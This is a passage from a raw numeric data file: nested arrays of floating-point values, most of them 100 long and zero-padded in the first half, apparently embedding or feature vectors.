1.808, -0.234, 0.7017, -0.5415, 0.106, -0.1678, -0.02924, 1.149, -0.1597, -0.2277, -0.1355, 1.564, 0.781, -0.7246, -0.5938, -0.999, 0.092, 0.4507, -0.539, 0.548, -0.3132, -0.10474, 0.4106, 0.7515, 0.4949, -0.8584, -0.239, -0.2393, 0.4236, -0.274, 0.2233, -0.13], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.00583, 0.01645, -0.04987, -0.05817, 0.02448, 0.0158, -0.03558, 0.003952, -0.02164, 0.0113, 0.010056, -0.0641, 0.02402, 0.00583, -0.03516, 0.01378, -0.04208, -0.0349, -0.0375, -0.02574, -0.0547, -0.03586, 0.002085, -0.03635, 0.0248, 0.0335, 0.02165, 0.01984, -0.04718, -0.00706, -0.00931, -0.04944, -0.06186, 0.03001, -0.03009, 0.01391, -0.04825, -0.004513, -0.01894, 0.04022, 0.01819, 0.0376, -0.02705, 0.03372, -0.01982, -0.01659, 0.02092, -0.04224, -0.02606, -0.02498], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.28, 0.3777, -0.442, -1.278, -0.298, 1.281, -0.5425, -0.3464, 0.276, 0.5254, -0.2957, -0.5825, 0.1661, 0.1626, 0.3904, 0.1613, 0.04514, -0.1263, -1.202, 0.563, 0.4102, -1.772, -0.2196, -0.1243, 0.004547, 0.1006, -0.521, 0.0338, -0.2922, 0.1674, -0.3396, 0.423, 1.013, 0.7837, -0.3315, -0.6333, 0.0739, 0.9526, 0.2418, -0.2773, 0.4539, -0.0781, 0.4905, -0.1461, -0.8364, -0.8, -0.04453, -0.05927, -0.5234, 0.5137], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.10876, -0.02428, 0.4392, 0.6504, 0.1965, -0.8384, 0.1214, 1.17, 0.2328, 0.3047, -0.536, -1.065, 0.8696, 0.496, 0.1542, 0.05777, 0.089, 0.4883, -0.7075, -0.08936, -4.562, 0.1741, -0.211, -0.4795, -0.00846, 1.237, 0.291, 0.05136, 0.3975, 0.2632, -0.8623, -0.06082, 0.5806, 0.3206, -0.7837, 0.3662, -0.02449, -0.0982, 0.5747, -0.5967, 0.5894, -0.7046, -0.561, -0.084, 0.0148, 0.1432, -0.1126, 0.11566, 0.02419, 0.00782], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.08765, 0.6006, -0.3933, 1.051, 0.26, -0.1387, 0.319, -0.597, -0.7056, 0.6167, -4.617, 0.2725, 0.432, -0.1575, -0.3286, 0.519, -0.874, -0.0952, 1.0, -0.2961, -0.1764, -0.2441, 0.4016, -0.95, 0.0174, -1.438, 1.338, 0.1537, -0.458, 0.9473, -1.316, 0.2795, -0.774, 0.8223, -1.338, -0.5674, 0.4534, 0.2507, 0.4292, 0.2234, 1.011, -0.9844, 0.2317, 0.1796, -0.3079, 0.4976, 0.384, -0.143, -0.4805, -1.605], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.262, 0.661, -0.4253, 0.989, -0.2634, -0.08545, 0.727, 0.0519, -0.0411, 1.034, 2.947, -0.603, 0.6646, 1.787, -1.78, 0.4426, -0.1941, 0.6216, 0.3884, -0.02223, 0.04642, 0.7266, 0.4312, -1.126, -0.0164, -0.4316, -0.714, 0.769, -0.18, 2.375, -1.707, 0.4666, 0.957, 1.544, -1.453, -0.7217, 0.3167, -0.6045, 1.53, -0.5034, -0.10425, 0.715, 0.4912, 0.015045, 0.1528, 0.1638, 0.666, -1.191, -0.536, -0.653], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.668, -0.02022, -0.4302, -0.5986, 0.3535, -0.4646, -0.12006, -0.0442, 0.1613, 1.195, 0.1637, 0.2397, 0.4604, 1.543, 0.5903, 0.553, 0.03336, 1.096, -0.1825, 0.174, -2.191, 0.2266, 0.2625, 0.9956, 0.04175, 0.5254, -0.4443, -0.2927, -0.1973, -0.461, -0.4521, -0.2612, 0.2263, -0.2479, -0.1584, 0.3867, -1.021, 0.2477, 0.2612, 0.2678, -0.367, -0.302, -1.061, 0.2556, 0.148, -0.01314, 0.2164, 0.664, 0.6475, -0.0201], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.522, -0.3928, 0.2905, -0.1028, 0.713, -2.283, 1.424, 0.4412, 0.297, -0.1198, -0.6753, 0.1329, 0.1436, -0.00591, 0.3198, 0.629, 0.5044, 0.807, -1.695, -2.906, 0.05045, 0.6626, -0.8228, 0.3096, 0.04413, 0.703, 0.1733, -0.07324, 1.279, 0.1576, 0.003918, 0.2429, -0.1642, -1.0205, -0.05414, -2.398, 0.0938, -0.2756, -0.4885, 1.018, -0.3225, -0.432, -0.545, -1.186, -0.6465, -0.353, 1.0, 0.7026, 0.4104, 0.06146], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.296, 0.4875, -0.2507, -0.7974, -0.2324, 0.4185, 0.3872, 0.96, -0.1919, 1.045, -0.652, -0.2798, 0.7163, 0.3423, 0.8296, 0.1484, -0.11316, -0.447, -0.3013, 0.1136, -0.0545, -0.2625, -1.231, 0.1847, -0.04263, 1.192, -0.4333, 0.07574, 0.665, -0.398, 0.2374, -0.4692, -0.626, 0.142, -0.1678, 0.2754, -0.7583, 0.5093, -0.2183, -0.663, -0.0596, -0.02704, 0.525, -0.232, -0.0003896, 0.1353, -0.462, 0.999, -0.3032, 0.02649], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.05978, -0.1815, 0.2344, 1.165, 0.09717, 0.214, 0.21, 0.3296, -0.6685, 0.2937, -0.989, -0.289, 0.1522, -0.328, -1.0, 0.006508, 0.541, 0.4094, -1.003, -0.669, -0.066, 0.3145, -0.3557, -0.05087, 0.03793, 0.501, -0.1107, 0.474, 0.1442, -0.6875, -0.477, 0.4353, 0.572, 1.826, -0.93, -0.11835, -0.3499, 0.1942, 1.55, 0.02454, -0.1842, 0.2932, -0.0971, -0.0633, 0.2274, 0.8726, -0.601, -0.985, -0.616, -0.7305], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2256, -0.1345, 2.604, -0.2798, -0.03268, 2.945, -0.38, 1.067, 0.257, -0.2461, 0.00626, 1.004, 0.4443, 1.989, 0.4568, 0.1012, 0.2913, 0.4824, 0.06287, -0.635, -0.8574, 0.03464, -0.6562, -0.1549, 0.0263, -0.08386, 0.3125, -0.4038, 0.1927, 1.177, -0.4463, 1.141, -0.4224, 0.4417, -0.175, 0.2375, 0.3623, -1.084, 0.7915, -0.2886, 0.1523, 0.1656, -5.586, -0.2922, -0.61, 0.003597, 0.0598, 0.3374, -0.04562, -0.05157], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0766, 0.121, 0.1593, -0.3765, -0.0741, -0.827, -0.5776, -0.3413, 0.2026, 0.2094, 0.0714, 0.2212, 0.2676, -0.277, -0.0728, -0.1219, 0.3801, 0.6875, -0.8516, 0.1486, 0.243, -0.1863, -0.2688, 0.1377, -0.011284, -0.2915, -0.0438, -0.1384, 0.3477, 0.00719, -0.3423, -0.678, -0.8105, 0.2247, 0.2837, 0.2408, 0.3687, 0.1667, -0.5845, -0.1186, -0.5503, 0.2137, 0.406, 0.634, 0.03757, -0.2147, -0.4487, 0.853, 0.3682, -0.235], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.005344, -0.005375, -0.1844, -0.1422, -0.4163, 0.363, 0.3452, 0.2961, -0.12463, 0.322, -0.2354, -0.0981, 0.4094, -0.04977, -0.3755, -0.251, -0.09814, 0.07227, 0.54, 0.267, 0.3186, 0.3896, -0.00588, -0.5376, 0.0225, 0.1459, 0.456, 0.4353, -0.4207, -0.9043, -0.137, -0.532, 0.09033, -0.1045, 0.0679, -0.05405, -0.54, 0.518, -0.004795, -0.007996, 0.467, 0.001567, 0.3496, -0.1802, -0.2964, -0.424, 0.6357, -0.6045, 0.2097, -0.3027], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3167, 0.9414, 0.3423, -0.7285, 1.447, 1.598, 0.3784, -2.488, 1.754, 1.641, 0.6514, 0.896, 1.061, 0.333, -0.39, -1.518, 0.1954, 0.0682, 0.5723, 0.3572, -0.1768, -0.06186, -0.5127, -1.006, -0.01735, 0.794, 1.578, 0.706, -1.055, 1.966, 0.02258, 0.3064, -0.39, 0.06134, -0.1232, 0.2015, -0.514, 0.3577, -1.04, -2.53, -0.826, -0.1962, 1.855, 0.2438, -0.837, -1.631, 0.527, -1.883, 0.9663, -0.6304], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3176, -0.3198, -0.7114, 1.592, 0.08417, 1.879, 1.01, 0.7896, 0.5034, 0.549, 0.6157, 0.3955, -0.6978, -0.268, -2.107, 0.02959, 0.1395, -0.502, 5.973, -0.0728, 0.3342, 0.2527, -0.2776, -0.274, -0.0214, 0.5806, -0.842, -0.02933, 0.07776, -1.387, -2.268, 0.87, 0.9795, 0.852, -0.751, -1.045, 0.183, -0.06726, 1.709, -0.0696, 0.6284, -0.653, -1.73, -0.9546, -0.05615, 0.879, 0.635, -1.523, 0.625, -0.08105], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.03867, 0.03003, -0.04062, 0.01067, -0.0154, 0.04422, 0.01979, -0.010445, -0.02956, -0.000415, -0.01141, -0.03397, 0.009674, 0.02197, -0.0583, 0.02272, 0.01645, -0.02881, -0.02467, 0.03004, 0.01949, -0.002428, -0.0389, -0.0477, 0.03001, -0.0142, -0.001708, 0.03372, -0.005344, -0.03992, -0.02095, -0.0419, 0.02359, -0.01605, -0.01071, 0.001165, -0.01929, -0.0133, 0.02905, 0.0238, 0.02519, -0.00846, -0.03903, -0.04944, -0.03082, -0.02647, -0.01192, -0.0405, 0.003494, -0.0002534], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.04425, -0.0224, 0.03955, 0.02815, 0.00757, 0.01487, 0.03827, -0.02411, 0.01363, 0.02698, 0.03967, -0.02367, -0.02393, 0.0401, -0.05368, 0.01642, -0.03897, 0.03116, 0.00924, -0.01695, -0.0214, -0.03424, -0.03897, -0.02284, 0.001491, -0.04602, -0.04196, -0.02809, 0.02719, -0.0504, -0.05038, -0.02753, 0.02359, -0.003052, 0.02232, -0.0285, -0.05368, 0.00979, 0.0401, -0.02185, 0.03107, -0.009415, 0.02, -0.0312, -0.01549, -0.02383, 0.03888, -0.00915, -0.05057, -0.02075], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.06174, 0.1968, 0.776, -0.5483, 0.7134, -0.944, -0.826, 1.354, -0.3923, -0.3738, 0.391, 1.711, 0.1772, 0.11127, -0.2966, 0.4084, -0.55, -0.5063, -0.698, -0.9204, -0.804, 0.3472, 0.4927, -0.3906, 0.02034, 1.919, 1.705, -2.441, 0.3264, 2.379, -0.927, 0.274, -0.0614, -0.175, -0.3877, 0.01239, 1.69, -0.551, 0.2527, 0.1942, -1.712, -2.076, -2.51, -0.637, 0.384, -1.568, -0.4314, 1.49, 1.46, 0.2883], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.06946, 0.2343, -0.03845, 1.886, 0.0264, -0.1407, -0.2942, 0.65, 0.1871, 1.053, -0.392, -0.0289, 0.2937, -0.00315, 0.011925, -0.05807, -0.175, 0.1534, -0.2377, 0.2181, 0.1075, -0.08545, 0.02826, 0.0676, 0.004192, 0.1683, 0.0516, -0.2158, -0.1637, 0.3408, -3.031, 0.0375, 0.2369, 2.033, -1.293, -0.171, -0.0948, 0.10895, 2.771, 0.02312, 0.1627, 0.02272, -0.03552, 0.1917, -0.00959, 0.878, 0.1398, -0.385, 0.975, 0.04282], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.09564, 0.434, -0.1124, 1.016, 0.2107, -0.6626, -1.037, 1.216, 0.2153, 0.2, 0.1572, -0.1754, 0.3079, 0.2954, 0.424, -0.701, 0.006207, -0.0682, 0.3591, 0.9565, 0.2396, 0.1805, 0.07324, 0.0871, -0.02148, -0.008606, 0.1758, -1.106, 0.7134, 1.054, -1.613, 0.2534, 1.106, 1.827, -2.092, 0.525, 0.0984, 0.601, 1.903, -0.0871, -0.247, -0.706, 0.05762, 0.2915, -0.01988, 0.9404, 0.323, -0.9023, 1.042, 0.4797], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.19, 0.026, -0.267, 0.771, -0.907, -1.083, -0.1326, -0.05957, -0.3792, -0.1764, 0.1329, 0.02359, -0.4272, 0.0412, -1.246, 0.695, -0.1864, 0.7876, 0.3013, 0.4873, 0.1984, -1.18, 0.4092, -0.1667, 0.004726, 0.463, 0.04028, 0.103, 0.2783, 0.07874, 0.7476, -1.435, -0.03043, 0.02127, 0.1266, -0.5005, 0.07654, 1.745, -0.1129, -0.05762, 0.2837, 0.006363, 1.309, 0.644, -0.25, 0.5996, -0.2051, 0.104, -0.6006, -0.0001557], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.696, -0.1296, 0.6, 0.304, 0.5645, 1.622, -0.2866, 0.8965, -0.3704, 0.07837, -0.1567, 0.01155, -0.546, -0.314, 0.423, 0.4407, 0.196, 0.0764, 1.042, 0.4346, 1.108, 1.145, -0.3384, 0.6978, -0.04303, -0.1606, 0.1752, -0.2192, 0.1384, -0.532, 0.492, 0.2803, -0.0919, -0.9775, -0.1443, 1.33, 0.929, -0.2644, -0.3257, 0.05066, -0.0672, 0.9204, 1.525, -0.01152, 1.236, 0.3835, 1.114, -1.213, -0.2335, 0.261], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.8896, 0.4277, 0.10205, -0.0691, -0.501, 0.0994, 0.0777, 0.3555, 0.12225, -0.33, -0.419, 0.10583, -0.3967, -0.352, -1.009, -0.6465, -0.1438, -5.94, 6.363, 0.7676, 1.069, -0.02528, -0.5454, 0.382, -0.03217, -0.3545, 0.0832, 0.2262, -3.453, -0.811, -0.002668, -0.438, 0.2988, -0.26, -0.0647, -0.4214, 0.265, 0.1884, -0.536, -0.092, 0.3442, 0.2396, 0.1564, 0.288, 0.06155, -0.3323, -0.2278, -0.969, 0.3396, 0.06696], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3127, 0.52, -0.2478, 0.606, -0.3088, 0.03903, 0.3855, 0.2284, 0.3335, -0.6074, -0.7256, -0.511, -1.266, 0.05698, 0.8477, -0.1953, -2.18, 0.445, 0.2725, -0.002396, 0.879, -0.3022, 0.0929, -0.02382, 0.01434, -0.3657, -0.1229, 0.3542, 0.1069, 1.15, 0.3481, 0.2747, -0.615, 0.7476, -0.1103, 0.405, -0.4727, -0.006268, -1.057, -0.333, -0.337, 0.3027, 1.453, 0.8613, 0.2416, -1.398, -0.6895, 0.1718, -0.6123, 0.2708], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1936, 1.445, 0.66, 1.594, 1.121, 0.1544, -0.3206, 1.954, 1.131, 0.749, 0.11127, 1.059, 0.1779, 0.174, 0.591, -0.1564, 1.002, -0.551, 0.4216, 0.4749, 0.2327, 0.767, -0.0873, -0.0645, 0.003176, 0.5044, 0.866, -0.129, -0.6675, 2.21, -0.928, -0.775, 0.6484, 1.996, -2.227, 0.2002, -0.4517, -1.155, 2.494, -0.2151, -0.355, 0.724, 1.154, 0.5986, -0.722, 0.3555, -0.1575, 0.4822, 1.853, -0.133], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1531, 0.01854, 0.4966, -0.1763, 0.1326, -0.3687, -0.3743, -0.6665, 0.784, 0.0973, -0.01929, 0.3062, -0.8325, -0.3186, 0.1594, 0.1783, 0.334, 0.437, -1.075, 0.288, -0.1497, 0.5786, -0.01636, -0.03004, -0.005238, 0.1716, 0.2708, 1.19, -0.1462, 1.774, 0.334, 0.702, -0.3408, -0.1829, -0.4233, 0.407, 0.3462, 0.2788, -0.0926, -1.198, 0.1254, -0.11, -0.1272, 0.1508, 0.5376, 0.2017, 0.3342, 0.02666, -0.11664, 0.7144], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1471, -0.921, -0.6704, 0.2764, -0.05957, -1.801, 0.4822, 1.182, 0.1637, 1.155, 0.2086, 0.12305, 0.01457, 0.4834, -0.3706, 0.11664, -0.2024, -3.197, 4.62, -0.3801, 0.06015, 0.1744, 0.537, -1.044, 0.04147, 0.1188, 0.2003, 0.321, -0.8687, 0.4207, -0.003963, 0.4966, 0.2654, 0.552, 0.1376, -0.09186, -0.642, 0.1442, 0.3352, 0.02664, -0.3916, -0.307, -2.186, -0.4695, 0.1555, 0.3296, 0.04996, -2.674, 1.098, -0.7593], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.52, -0.2522, 0.6104, 0.87, -0.1054, -0.5884, -0.3662, 0.3022, 0.1011, -0.279, -0.3076, 0.03976, 0.1498, 0.5435, -0.0666, 0.4536, 0.0149, -0.4556, 1.277, 0.0724, -2.014, 0.254, 0.531, 0.263, -0.004025, 0.845, 0.4873, -1.299, 0.3787, 1.79, -0.1628, 1.223, 1.735, -0.4185, 0.001391, -0.2073, 0.2148, -0.58, -0.4443, -0.524, -0.08777, -1.358, -2.082, -0.288, 0.2656, -0.0689, -0.6143, -0.4749, 0.65, 0.02986], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00338, 0.003582, -0.0523, -0.04358, -0.01215, 0.0389, -0.02449, 0.00833, -0.003098, -0.01678, -0.007538, -0.01395, -0.05157, -0.0135, -0.0501, 0.0319, 0.01181, -0.03745, -0.006615, -0.04715, 0.02112, 0.04193, -0.02872, -0.02419, 